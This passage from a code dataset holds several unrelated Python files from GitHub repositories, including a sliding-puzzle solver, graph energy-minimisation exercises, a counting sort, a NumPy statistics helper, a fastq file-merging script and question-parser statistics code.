的排列.\r\n'''\r\nfrom typing import List\r\n\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n '''\r\n BFS\r\n '''\r\n @printTime()\r\n def slidingPuzzle(self, board: List[List[int]]) -> int:\r\n cur = [[[1, 2, 3], [4, 5, 0]]]\r\n mem = [cur[0]]\r\n step = 0\r\n def getPosition(board):\r\n for i in range(2):\r\n for j in range(3):\r\n if board[i][j] == 0:\r\n return i, j\r\n return 0, 0\r\n def copy(board):\r\n temp = []\r\n for i in 
range(2):\r\n temp.append(board[i].copy())\r\n return temp\r\n while cur.__len__():\r\n if cur.__contains__(board):\r\n return step\r\n temp = []\r\n for c in cur:\r\n row, column = getPosition(c)\r\n if row == 1:\r\n t = copy(c)\r\n t[row][column], t[0][column] = t[0][column], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if row == 0:\r\n t = copy(c)\r\n t[row][column], t[1][column] = t[1][column], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if column > 0:\r\n t = copy(c)\r\n t[row][column], t[row][column - 1] = t[row][column - 1], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n if column < 2:\r\n t = copy(c)\r\n t[row][column], t[row][column + 1] = t[row][column + 1], t[row][column]\r\n if t not in mem:\r\n temp.append(t)\r\n mem.append(t)\r\n cur = temp\r\n step += 1\r\n return -1\r\nboard = [[3,2,4],[1,5,0]]\r\nSolution().slidingPuzzle(board)","repo_name":"CrzRabbit/Python","sub_path":"leetcode/0773_H_滑动谜题.py","file_name":"0773_H_滑动谜题.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31270702273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nfrom grid import Grid,determine_grid,row_column_decomposition\nimport numpy as np\nfrom collections import namedtuple\nimport copy\n\n\n#Exercise 3.1\n\ndef evaluate_energy(nodes, edges, assignment):\n\n\tenergy = 0\n\tfor i in range(len(nodes)):\n\t\tenergy = nodes[i].costs[assignment[i]] + energy\n\t\t\n\tfor j in range(len(edges)):\n\t\tenergy = edges[j].costs[assignment[edges[j].left],assignment[edges[j].right]] + energy\n\t\t\t\n\t\t\n\treturn energy\n\n#Random initialisation\ndef Rand_ini(nodes):\n\tlabeling=[]\n\tfor i in range(len(nodes)):\n\t\tlabeling.append(random.randint(0,len(nodes[i].costs)-1))\n\treturn labeling\n\n\ndef ICM_update_energy(Grid_,pos_node,Labeling,energy=0,prev_lab=None):\n\tif prev_lab==None:\n\t\tnew_energy=Grid_._nodes[pos_node].costs[Labeling[pos_node]]\n\t\tfor edge in Grid_.edges(pos_node,True):\n\t\t\tif edge.left==pos_node:\n\t\t\t\tnew_energy=new_energy+edge.costs[Labeling[pos_node],Labeling[edge.right]]\n\t\t\telse:\n\t\t\t\tnew_energy=new_energy+edge.costs[Labeling[edge.left],Labeling[pos_node]]\n\t\treturn new_energy\n\t\n\t\n\tnew_energy=energy-Grid_._nodes[pos_node].costs[prev_lab]+Grid_._nodes[pos_node].costs[Labeling[pos_node]]\n\t\n\tfor edge in Grid_.edges(pos_node,True):\n\t\tif edge.left==pos_node:\n\t\t\t\tnew_energy=new_energy-edge.costs[prev_lab,Labeling[edge.right]]+edge.costs[Labeling[pos_node],Labeling[edge.right]]\n\t\telse:\n\t\t\tnew_energy=new_energy-edge.costs[Labeling[edge.left],prev_lab]+edge.costs[Labeling[edge.left],Labeling[pos_node]]\n\treturn new_energy\n\n#ICM\ndef ICM(grid):\n\t#Random initialisation\n\tlabeling=Rand_ini(grid._nodes)\n\t\n\tupdate=True\n\tnodes_order=[x for x in range(len(grid._nodes))]\n\t\n\twhile update:\n\t\tupdate=False\n\t\trandom.shuffle(nodes_order)\n\t\tfor i in nodes_order:\n\t\t\tmin_lab=labeling[i]\n\t\t\tmin_energy=ICM_update_energy(grid,i,labeling)\n\t\t\tfor lab in range(len(grid._nodes[i].costs)):\n\t\t\t\tif lab!=min_lab:\n\t\t\t\t\tlabeling[i]=lab\n\t\t\t\t\tenergy=ICM_update_energy(Grid_=grid,pos_node=i,Labeling=labeling,energy=min_energy,prev_lab=min_lab)\n\t\t\t\t\tif energy<min_energy:\n\t\t\t\t\t\tupdate=True\n\t\t\t\t\t\tmin_lab=lab\n\t\t\t\t\t\tmin_energy=energy\n\t\t\tlabeling[i]=min_lab\n\treturn 
labeling\n\t\t\t\n\n\n\ndef dynamic_programming_tree(nodes,edges):\n\tF=[]\n\t\n\tfor i in range(len(nodes)):\n\t\tF.append(copy.deepcopy(nodes[i].costs))\n\t\n\t#Calculates edges associated with each node. Position i of the list correspond to the edges incident to vertex \n\t# i. Length of list of position i gives degree of i\n\tdegree_nodes=[[] for _ in range(len(nodes))]\n\tfor e in range(len(edges)):\n\t\tdegree_nodes[edges[e].left].append(e)\n\t\tdegree_nodes[edges[e].right].append(e)\n\t\t\n\tr=[np.zeros(len(nodes[i].costs)) for i in range(len(nodes))]\n\torder=[] #stores order of visited leaves and neighbour\n\twhile any(degree_nodes):\n\t\tedge_leave,leave,neighbour_leave=find_leave(degree_nodes,edges)\n\t\tdegree_nodes[leave]=None\n\t\tdegree_nodes[neighbour_leave].remove(edge_leave)\n\t\t\n\t\tfor s in range(np.size(F[neighbour_leave])):\n\t\t\tF_S=[]\n\t\t\tfor t in range(np.size(F[leave])):\n\t\t\t\tlabel_edge=(s,t)*(edges[edge_leave].left==neighbour_leave)+(t,s)*(edges[edge_leave].left==leave)\n\t\t\t\tF_S.append(F[leave][t]+edges[edge_leave].costs[label_edge])\n\t\t\tF[neighbour_leave][s]=F[neighbour_leave][s]+min(F_S)\n\t\t\tr[leave][s]=np.argmin(F_S)\n\t\torder.append((leave,neighbour_leave))\n\t\n\n\n\tintermediates=[F,r,order]\n\treturn(intermediates)\n\ndef find_leave(degree_nodes,edges):\n\tleave=-1\n\tfor i in degree_nodes:\n\t\tleave=leave+1\n\t\tif i!=None:\n\t\t\tif len(i)==1:\n\t\t\t\tneighbour_leave=(edges[i[0]].left!=leave)*edges[i[0]].left+(edges[i[0]].right!=leave)*edges[i[0]].right\n\t\t\t\tedge_leave=i[0]\n\t\t\t\n\t\t\t\treturn edge_leave,leave,neighbour_leave\n\treturn None,None,None\n\t\t\ndef backtrack_tree(nodes,edges,F,r,order):\n\tassignment=[0]*len(nodes)\n\tenergy_ls=[]\n\tleave=order[-1][-1]\n\tfor t in range(np.size(F[leave])):\n\t\tenergy_ls.append(F[leave][t])\n\tassignment[leave]=np.argmin(energy_ls)\n\t\n\tfor i in reversed(range(len(order))):\n\t\tassignment[order[i][0]]=int(r[order[i][0]][int(assignment[order[i][1]])])\n\n\t\n\treturn(assignment)\t\n\nNode = namedtuple('Node', 'costs')\nEdge = namedtuple('Edge', 'left right costs')\n\ndef create_aux_graph(sub_graph,labeling,grid):\n\tnodes = []\n\tedges = []\n\tset_edges_subgraph=set()\n\tfor edge in sub_graph:\n\t\tset_edges_subgraph.add((edge.left,edge.right))\n\t\n\tfor edge in sub_graph:\n\t\tcost=grid._nodes[edge.left].costs\n\t\tnode=edge.left\n\t\tneighbours=grid.edges(node,True)\n\t\tset_neighbours=set()\n\t\tfor edge_neigh in neighbours:\n\t\t\tset_neighbours.add((edge_neigh.left,edge_neigh.right))\n\t\tedges_node_not_subgraph=list(set_neighbours-set_edges_subgraph)\n\n\n\t\tcosts_new_graph=cost.copy()\n\t\tfor i in range(len(cost)):\n\t\t\tfor edge2 in neighbours:\n\t\t\t\tif (edge2.left,edge2.right) in edges_node_not_subgraph:\n\t\t\t\t\tif edge2.left==node:\n\t\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[i,labeling[edge2.right]] \n\t\t\t\t\telse:\n\t\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[labeling[edge2.left],i] \n\t\tnodes.append(Node(costs=costs_new_graph))\n\n\t#For right node of the last edge\n\tcost=grid._nodes[edge.right].costs\n\tnode=edge.right\n\tneighbours=grid.edges(node,True) \n\tset_neighbours=set()\n\tfor edge_neigh in neighbours:\n\t\tset_neighbours.add((edge_neigh.left,edge_neigh.right))\n\tedges_node_not_subgraph=list(set_neighbours-set_edges_subgraph)\n\tcosts_new_graph=cost.copy()\n\tfor i in range(len(cost)):\n\t\tfor edge2 in neighbours:\n\t\t\tif (edge2.left,edge2.right) in edges_node_not_subgraph:\n\t\t\t\tif 
edge2.left==node:\n\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[i,labeling[edge2.right]] \n\t\t\t\telse:\n\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[labeling[edge2.left],i] \n\tnodes.append(Node(costs=costs_new_graph))\n\tedges=[Edge(left=i, right=i+1, costs=sub_graph[i].costs) for i in range(len(sub_graph))]\n\treturn nodes,edges\n\ndef trans_labeling_to_big_graph(sub_graph,aux_labeling,labeling_):\n\tcount=0\n\tlabeling=labeling_.copy()\n\tfor e in sub_graph:\n\t\t\n\t\tlabeling[e.left]=aux_labeling[count]\n\t\t\n\t\tcount=count+1\n\tlabeling[sub_graph[-1].right]=aux_labeling[-1]\n\treturn labeling\n\n\ndef trans_labeling_to_aux_graph(sub_graph,labeling_):\n\tcount=0\n\taux_old_labeling=[0]*(len(sub_graph)+1)\n\tfor e in sub_graph:\n\t\taux_old_labeling[count]=labeling_[e.left]\n\t\t\t\t\t\t\t\n\t\tcount=count+1\n\taux_old_labeling[-1]=labeling_[sub_graph[-1].right]\n\treturn aux_old_labeling\n#BLOCK-ICM\ndef Block_ICM(grid):\n\t#Random initialisation\n\tlabeling=Rand_ini(grid._nodes)\n\tdecomp=row_column_decomposition(grid)\n\tupdate=True\n\twhile update:\n\t\tupdate=False\n\t\trandom.shuffle(decomp)\n\t\tfor sub_graph in decomp:\n\t\t\taux_sub_graph=create_aux_graph(sub_graph,labeling,grid)\n\t\t\tintermediates=dynamic_programming_tree(aux_sub_graph[0],aux_sub_graph[1])\n\t\t\taux_labeling=backtrack_tree(aux_sub_graph[0],aux_sub_graph[1],*intermediates)\n\t\t\taux_old_labeling=trans_labeling_to_aux_graph(sub_graph,labeling)\n\t\t\told_energy_aux=evaluate_energy(aux_sub_graph[0],aux_sub_graph[1],aux_old_labeling)\n\t\t\tnew_energy_aux=evaluate_energy(aux_sub_graph[0],aux_sub_graph[1],aux_labeling)\n\t\t\tif new_energy_aux<old_energy_aux:\n\t\t\t\tnew_labeling=trans_labeling_to_big_graph(sub_graph,aux_labeling,labeling)\n\t\t\t\tupdate=True\n\t\t\t\tlabeling=new_labeling\n\treturn labeling\n\n\n\n\n\n#%%\n#Exercise 3.4\n \n\ndef TRWS(grid,N=10,T_=2):\n F={}\n B={}\n r={}\n num_nodes=len(grid._nodes)\n #first u_num for node\n # following (u_num,v_num ) refer to edge\n for u_num in range(num_nodes):\n for v_num in grid.neighbors(u_num,isotropic=True):\n if u_num<v_num:\n F[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n B[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n r[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n else:\n F[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n B[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n r[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n \n list_nodes=[i for i in range(num_nodes)]\n for t in range(N):\n for u_num in list_nodes:\n u=grid._nodes[u_num]\n u_num_labels=len(u.costs)\n hat_theta=[]\n for s in range(u_num_labels):\n theta_aux=u.costs[s]\n for v_num in grid.neighbors(u_num,isotropic=True):\n if v_num<u_num:\n theta_aux=theta_aux+F[(u_num,v_num,u_num)][s]\n else:\n theta_aux=theta_aux+B[(u_num,u_num,v_num)][s]\n hat_theta.append(theta_aux)\n \n for edge in grid.edges(u_num):\n v_num=edge.right\n v=grid._nodes[v_num]\n for l in range(len(v.costs)):\n aux_list=[]\n for s in range(u_num_labels):\n aux_list.append(hat_theta[s]/T_-B[(u_num,u_num,v_num)][s]+edge.costs[s,l])\n F[(v_num,u_num,v_num)][l]=np.min(aux_list)\n r[(v_num,u_num,v_num)][l]=np.argmin(aux_list)\n \n dict_aux=F.copy()\n F=B.copy()\n B=dict_aux.copy()\n list_nodes=list_nodes[::-1]\n assignment=reconstruct_labeling(grid,B)\n return assignment\n\ndef reconstruct_labeling(grid,B):\n num_nodes=len(grid._nodes)\n u_num=num_nodes-1\n u=grid._nodes[u_num]\n assignment=[0]*num_nodes\n aux_list=[]\n for s in 
range(len(u.costs)):\n aux_sum=0\n for v_num in grid.neighbors(u_num,isotropic=True):\n if u_num<v_num:\n aux_sum=aux_sum-B[(u_num,u_num,v_num)][s]\n else:\n aux_sum=aux_sum-B[(u_num,v_num,u_num)][s]\n aux_list.append(u.costs[s]-aux_sum)\n assignment[u_num]=np.argmin(aux_list)\n \n for u_num in reversed(range(num_nodes-1)):\n u=grid._nodes[u_num]\n aux_list=[]\n for s in range(len(u.costs)):\n aux_sum=0\n for edge in grid.edges(u_num,isotropic=True):\n if u_num==edge.left:\n v_num=edge.right\n else:\n v_num=edge.left\n if u_num<v_num:\n aux_sum=aux_sum+(u_num==edge.left)*edge.costs[s,assignment[v_num]]+(v_num==edge.left)*edge.costs[assignment[v_num],s]\n else:\n aux_sum=aux_sum+B[(u_num,v_num,u_num)][s]\n aux_list.append(u.costs[s]+aux_sum)\n assignment[u_num]=np.argmin(aux_list)\n return assignment\n\n#from tsukuba_model import all_models\n#from tsukuba_visualize import to_image\n#import matplotlib.pyplot as plt\n#from grid import determine_grid\n#import numpy as np\n#import time\n#models=all_models()\n#count=0\n#for model in models:\n# print('MODEL DOWN',2**(5-count))\n# \n# grid=determine_grid(model[0],model[1])\n# \n# start= time.time()\n# assignment=TRWS(grid)\n# end= time.time()\n# energy=evaluate_energy(grid._nodes, grid._edges, assignment)\n# img_size=(12*(2**count),9*(2**count))\n# print (img_size)\n# print('Objective cost=',energy)\n# print('Time elapsed', end-start)\n# img=to_image(assignment,img_size)\n# plt.imshow(np.asarray(img),cmap='gray')\n# plt.show()\n# count=count+1\n","repo_name":"Shivalid/Optimization-for-Machine-Learning","sub_path":"Ex3/Exercise3.py","file_name":"Exercise3.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9729147304","text":"from setuptools import setup\n\nimport os\n\n\nlong_description = \"\"\nif os.path.exists('README.md'):\n long_description = open('README.md').read()\n\n\nsetup(\n name='push7',\n version='0.0.6',\n description='Python API Client for Push7',\n long_description=long_description,\n license=\"MIT\",\n keywords=\"push7\",\n author='a_r_g_v',\n author_email='info@arg.vc',\n url='https://github.com/a-r-g-v/push7-python',\n test_suite='tests',\n packages=['push7'],\n install_requires=['requests', 'simplejson', 'six', 'enum34', 'typing'])\n","repo_name":"a-r-g-v/push7-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"41168514323","text":"#given a list of numbers or variables in a string, with relation '>'\n#determines if the relations hold, and returns a dictionary of the values\n\ndef tOrder(string):\n el = string.split(\" > \")\n work = \"{\"\n for e in el:\n work = work + \"'\" + e + \"'\" +\":\" + e + \", \"\n \n if eval(string) == True:\n print(\"order HOLDS.\")\n else:\n print(\"order MODIFIED.\")\n \n work = work + \"}\"\n return eval(work)\n\n \n#finds an ordering of a set of pairs of dictionary elements\ndef findOrder(elmPairs):\n result = elmPairs\n #for e in result:\n # result[result.index(e)] = Dec.copy_abs(e)\n \n sort_result = sorted(result.items(), key=lambda x: x[1], reverse=True)\n string = \"\"\n for i in sort_result:\n #print(i[0])\n string = string + \" > \" + i[0]\n \n string = string[3:] #removes the erroneous additional \">\"\n #return sort_result\n return 
string\n","repo_name":"doorkicker/snippets","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"188553809","text":"import numpy as np\n\ndef calculate(list):\n if len(list) < 9:\n raise ValueError( \"List must contain nine numbers.\" )\n else:\n\n lst=np.array(list)\n\n mean_rows_cal=[lst[0:3].mean(), lst[3:6].mean(), lst[6:9].mean()]\n mean_cols_cal=([lst[[0,3,6]].mean(),lst[[1,4,7]].mean(),lst[[2,5,8]].mean()])\n\n var_rows_cal=[lst[0:3].var(), lst[3:6].var(), lst[6:9].var()]\n var_cols_cal=([lst[[0,3,6]].var(),lst[[1,4,7]].var(),lst[[2,5,8]].var()])\n\n std_rows_cal=[lst[0:3].std(), lst[3:6].std(), lst[6:9].std()]\n std_cols_cal=([lst[[0,3,6]].std(),lst[[1,4,7]].std(),lst[[2,5,8]].std()])\n\n min_rows_cal=[lst[0:3].min(), lst[3:6].min(), lst[6:9].min()]\n min_cols_cal=([lst[[0,3,6]].min(),lst[[1,4,7]].min(),lst[[2,5,8]].min()])\n \n max_rows_cal=[lst[0:3].max(), lst[3:6].max(), lst[6:9].max()]\n max_cols_cal=([lst[[0,3,6]].max(),lst[[1,4,7]].max(),lst[[2,5,8]].max()])\n\n sum_rows_cal=[lst[0:3].sum(), lst[3:6].sum(), lst[6:9].sum()]\n sum_cols_cal=([lst[[0,3,6]].sum(),lst[[1,4,7]].sum(),lst[[2,5,8]].sum()])\n \n \n \n\n \n\n\n\n\n return{\n 'mean':[mean_cols_cal,mean_rows_cal,lst.mean()],\n 'variance': [var_cols_cal, var_rows_cal, lst.var()],\n 'standard deviation': [std_cols_cal, std_rows_cal, lst.std()],\n 'max': [max_cols_cal, max_rows_cal, lst.max()],\n 'min': [min_cols_cal, min_rows_cal, lst.min()],\n 'sum': [sum_cols_cal,sum_rows_cal, lst.sum()]\n \n }","repo_name":"mhpolas/mean-variance-standard-deviation-calculator-mhpolas","sub_path":"mean_var_std.py","file_name":"mean_var_std.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37797172211","text":"import unittest\n\nimport cliente\nimport json\n\nfrom ojeo import Ojeo\nimport jugador\n#from ojeo import Ojeo\n\n\nclass TestOjeo(unittest.TestCase):\n\n def setUp(self):\n dbacceso.activar_testeo()\n self.app = cliente.app.test_client()\n #cliente.Ojeo.crear_ejemplos()\n dbacceso.insert_test_db('delete from jugador')\n\n \n def test_get_Ojeos(self):\n return None # --\n ret = self.app.get('/Ojeo').get_data(as_text=True) # JSON string\n retpy = json.loads(ret) # Python dict\n \n len_now = len(retpy)\n \n self.app.post('/Ojeo', data={'nombre':'Cebolla', 'club':'independiente', 'posicion':'volante', 'costo':1000})\n \n ret = self.app.get('/Ojeo').get_data(as_text=True) # JSON string\n retpy = json.loads(ret) # Python dict\n\n self.assertEqual( len(retpy) , len_now+1 )\n \nif __name__ == \"__main__\":\n unittest.main()","repo_name":"mat105/rest_python","sub_path":"test_ojeo.py","file_name":"test_ojeo.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28585049235","text":"# Counting Sort\n# Chcemy posortowac pewna tablice rozmiaru n zawierajaca liczby od 0 do k-1 (dla liczb naturalnych)\n# zachowuje stablinosc, O(n+k)\n\ndef counting_sort(A, k): # k - zakres liczb od 0 do k (dla 5 k = 6)\n C = [0] * k # dla A=[1,3,2,4,0,4,2]\n B = [0] * len(A) # C=[1,1,2,2,1], bo 0 wystepuje raz, 1 wystepuje raz itp.\n for i in range(len(A)): # albo { for x in A\n C[A[i]] += 1 # C[x] += 1 }\n for i in range(1, k): # ile liczb jest mniejszych\n C[i] += C[i-1] # lub rownych i # C=[1,2,4,6,7]\n for i in 
range(len(A)-1, -1, -1): # przegladam tablice od tylu\n C[A[i]] -= 1 # dla \"2\": 2 jest wieksza lub rowna od 4 liczb\n B[C[A[i]]] = A[i] # wiec odejmuje 1 dostaje 3 (C = [1,2,3,6,7])\n for i in range(len(A)): # i umieszczam na 3 pozycji dwojke w tablicy B itp.\n A[i] = B[i]\n\n\n# T = [1, 9, 12, 0, 1, 14, 15, 2]\n# (counting_sort(T, 16))\n# print(T)\n\nT = [0, 5, 2, 3, 3, 2, 0]\ncounting_sort(T, 6)\n# print(T)","repo_name":"marcepanowyy/Algorithms-DataStructures","sub_path":"Sorting/CountingSort.py","file_name":"CountingSort.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42307648539","text":"import glob\nimport os\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='Combine samples from different lanes into one')\nparser.add_argument('-s', '--sample', dest = 'sample', help = 'sample name, e.g., 18774X1')\nargs = parser.parse_args()\n\ndef naturalSort(mylist):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n return sorted(mylist, key = alphanum_key)\n\n# set file extensions\nforwardExt='_R1_001.fastq.gz'\nreverseExt='_R3_001.fastq.gz'\numiExt='_R2_001.fastq.gz'\n\n# combine samples\nsampleName=str(args.sample).split('_')[0]\n\nforwardFiles=naturalSort(glob.glob(sampleName+'_*'+forwardExt))\nos.system('cat '+' '.join(forwardFiles)+' > ./'+sampleName+forwardExt)\n\nreverseFiles=naturalSort(glob.glob(sampleName+'_*'+reverseExt))\nos.system('cat '+' '.join(reverseFiles)+' > ./'+sampleName+reverseExt)\n\numiFiles=naturalSort(glob.glob(sampleName+'_*'+umiExt))\nos.system('cat '+' '.join(umiFiles)+' > ./'+sampleName+umiExt)\n","repo_name":"BrianLohman/ctseq-nf","sub_path":"combineFiles.py","file_name":"combineFiles.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32982475792","text":"import json\nimport csv\nimport os\nfrom pathlib import Path\n\nfrom statistics import mean\n\n#from geo_question_parser import QuestionParser\nfrom geo_question_parser_haiqi.Identify_new import QuestionParser as QuestionParserNew\n\n\ndef parseConceptTree(corpusId = \"GeoAnQu\", corpusNS = \"qac\"):\n jsonArray = []\n\n # [SC] open corpus datafile\n with open(Path(f\"{corporaDir}/{corpusId}.txt\"), 'r') as datacsvfile:\n datacsvreader = csv.DictReader(datacsvfile, delimiter=';')\n\n # parser = QuestionParser(None)\n parser = QuestionParserNew()\n\n # [SC] iterate through the questions in the corpus\n for q in datacsvreader:\n qId = q[\"ID\"]\n qStr = q[\"Question\"]\n\n if \"Fixed\" in q and q['Fixed'] == \"0\":\n continue\n\n qParsed = {}\n try:\n qParsed = parser.parseQuestion(qStr)\n except Exception as e:\n print(\"================================================== Exception\")\n print(f\"while parsing question with id {qId} and {qStr}\")\n print(e)\n\n jsonObj = {\n \"id\": qId,\n \"qParsed\": qParsed\n }\n\n if \"RQuestion\" in q:\n rqStr = q[\"RQuestion\"]\n rqParsed = {}\n try:\n rqParsed = parser.parseQuestion(rqStr)\n except Exception as e:\n print(\"================================================== Exception\")\n print(f\"while parsing question with id {qId} and {rqStr}\")\n print(e)\n\n jsonObj[\"rqParsed\"] = rqParsed\n\n jsonArray.append(jsonObj)\n\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'w') as f:\n json.dump(jsonArray, f, indent=4)\n\n return 
jsonArray\n\n\ndef generateStats(corpusId, revised=False):\n typesStr = ['conamount', 'amount', 'eventquality', 'objconobjconpro', 'field', 'placename', 'boolfield',\n 'objconamount', 'network', 'distfield', 'aggre', 'object', 'objectquality', 'distanceBand', 'grid',\n 'networkquality', 'allocation', 'proportion', 'event', 'eveconamount', 'covamount', 'location',\n 'eveconobjconpro']\n typesStr.sort()\n\n # [SC] open the json file containing parsed results\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f\\\n , open(Path(f\"{corporaDir}/{corpusId}_missing.json\"), 'r') as fm:\n jsonArray = json.load(f)\n missingJsonArray = json.load(fm)\n jsonArray.extend(missingJsonArray)\n\n suffix = \"\"\n if revised:\n suffix = \"_r\"\n\n # [SC] type and transformation count summary is stored in this CSV file\n with open(Path(f\"{dataOutputDir}/{corpusId}_ParserStats{suffix}.txt\"), 'w', newline='') as statsFile:\n fieldnames = ['ID', 'Question', 'qTypesCount', 'qTransCount', 'qOutputType']\n fieldnames.extend(typesStr)\n statsWriter = csv.DictWriter(statsFile, fieldnames=fieldnames, delimiter=\";\")\n statsWriter.writeheader()\n\n for qResult in jsonArray:\n newRow = {\n \"ID\": qResult[\"id\"],\n \"Question\": \"NA\",\n \"qTypesCount\": \"NA\",\n \"qTransCount\": \"NA\",\n 'qOutputType': \"NA\"\n }\n for typeStr in typesStr:\n newRow[typeStr] = \"NA\"\n\n nodeName = \"qParsed\"\n if revised:\n nodeName = \"rqParsed\"\n\n # [SC] create a summary for the original question\n if nodeName in qResult and not qResult[nodeName][\"question\"] == \"NA\":\n qParsed = qResult[nodeName]\n\n newRow[\"Question\"] = qParsed[\"question\"]\n newRow[\"qTypesCount\"] = 0\n newRow[\"qTransCount\"] = 0\n\n for typeStr in typesStr:\n newRow[typeStr] = 0\n\n if \"cctrans\" in qParsed:\n if \"types\" in qParsed[\"cctrans\"]:\n newRow[\"qTypesCount\"] = len(qParsed[\"cctrans\"][\"types\"])\n\n for typeObj in qParsed[\"cctrans\"][\"types\"]:\n typeStr = typeObj[\"type\"]\n newRow[typeStr] = newRow[typeStr] + 1\n\n if \"transformations\" in qParsed[\"cctrans\"]:\n transCount = len(qParsed[\"cctrans\"][\"transformations\"])\n newRow[\"qTransCount\"] = transCount\n\n # [SC] extract type of the output\n transesObj = qParsed[\"cctrans\"][\"transformations\"]\n for transIndex in range(transCount-1, -1, -1):\n afterId = transesObj[transIndex][\"after\"][0]\n\n finalOutput = True\n for transObj in transesObj:\n if afterId in transObj[\"before\"]:\n finalOutput = False\n\n if finalOutput:\n for typeObj in qParsed[\"cctrans\"][\"types\"]:\n if typeObj[\"id\"] == afterId:\n newRow[\"qOutputType\"] = typeObj[\"type\"]\n break\n\n statsWriter.writerow(newRow)\n\n\ndef printBasicStats(corpusId):\n # [SC] open the json file containing parsed results\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f \\\n , open(Path(f\"{corporaDir}/{corpusId}_missing.json\"), 'r') as fm:\n jsonArray = json.load(f)\n missingJsonArray = json.load(fm)\n jsonArray.extend(missingJsonArray)\n\n qTypesCount = 0\n qTransCount = 0\n qTypeLengths = []\n qTransLengths = []\n\n rqTypesCount = 0\n rqTransCount = 0\n rqTypeLengths = []\n rqTransLengths = []\n\n for qResult in jsonArray:\n qParsed = qResult[\"qParsed\"]\n if \"cctrans\" in qParsed:\n if \"types\" in qParsed[\"cctrans\"] and qParsed[\"cctrans\"][\"types\"]:\n qTypesCount += 1\n qTypeLengths.append(len(qParsed[\"cctrans\"][\"types\"]))\n if \"transformations\" in qParsed[\"cctrans\"] and qParsed[\"cctrans\"][\"transformations\"]:\n qTransCount += 1\n 
qTransLengths.append(len(qParsed[\"cctrans\"][\"transformations\"]))\n\n if \"rqParsed\" in qResult:\n rqParsed = qResult[\"rqParsed\"]\n if \"cctrans\" in rqParsed:\n if \"types\" in rqParsed[\"cctrans\"] and rqParsed[\"cctrans\"][\"types\"]:\n rqTypesCount += 1\n rqTypeLengths.append(len(rqParsed[\"cctrans\"][\"types\"]))\n if \"transformations\" in rqParsed[\"cctrans\"] and rqParsed[\"cctrans\"][\"transformations\"]:\n rqTransCount += 1\n rqTransLengths.append(len(rqParsed[\"cctrans\"][\"transformations\"]))\n\n print(f\"\\nStats for the corpus {corpusId}:\")\n print(\"\\tOriginal questions => \"\\\n f\"Types: {qTypesCount} ({round(qTypesCount*100/len(jsonArray))}%); \"\\\n f\"Transformations: {qTransCount} ({round(qTransCount*100/len(jsonArray))}%); \"\\\n f\"Types mean length: {round(mean(qTypeLengths), 1)}; \"\\\n f\"Trans mean length: {round(mean(qTransLengths), 1)}\")\n if len(rqTypeLengths) > 0:\n print(\"\\tReformatted questions => \"\\\n f\"Types: {rqTypesCount} ({round(rqTypesCount*100/len(jsonArray))}%); \"\\\n f\"Transformations: {rqTransCount} ({round(rqTransCount*100/len(jsonArray))}%) \"\\\n f\"Types mean length: {round(mean(rqTypeLengths), 1)}; \"\\\n f\"Trans mean length: {round(mean(rqTransLengths), 1)}\")\n\n\ndef compareToBaseline():\n baseline = Path(f\"{rootDir}/geo_question_parser_haiqi/orgResults/GeoAnQu_parser_results.json\")\n output = Path(f\"{rootDir}/outputData/GeoAnQu.json\")\n\n with open(output, 'r') as outf, open(baseline, 'r') as basef:\n outArray = json.load(outf)\n baseArray = json.load(basef)\n\n for index in range(len(baseArray)):\n # print(f\"comparing {outArray[index]['qParsed']['question']}\")\n\n if not baseArray[index][\"question\"] == outArray[index][\"qParsed\"][\"question\"]:\n print(\"========================== MISMATCHING questions\")\n print(baseArray[index][\"question\"])\n print(outArray[index][\"qParsed\"][\"question\"])\n elif not json.dumps(baseArray[index]) == json.dumps(outArray[index][\"qParsed\"]):\n print(\"========================== MISMATCHING PARSE for questions\")\n print(baseArray[index][\"question\"])\n print(outArray[index][\"qParsed\"][\"question\"])\n\n\ndef getUniqueTypes(corpusId=\"GeoAnQu\"):\n with 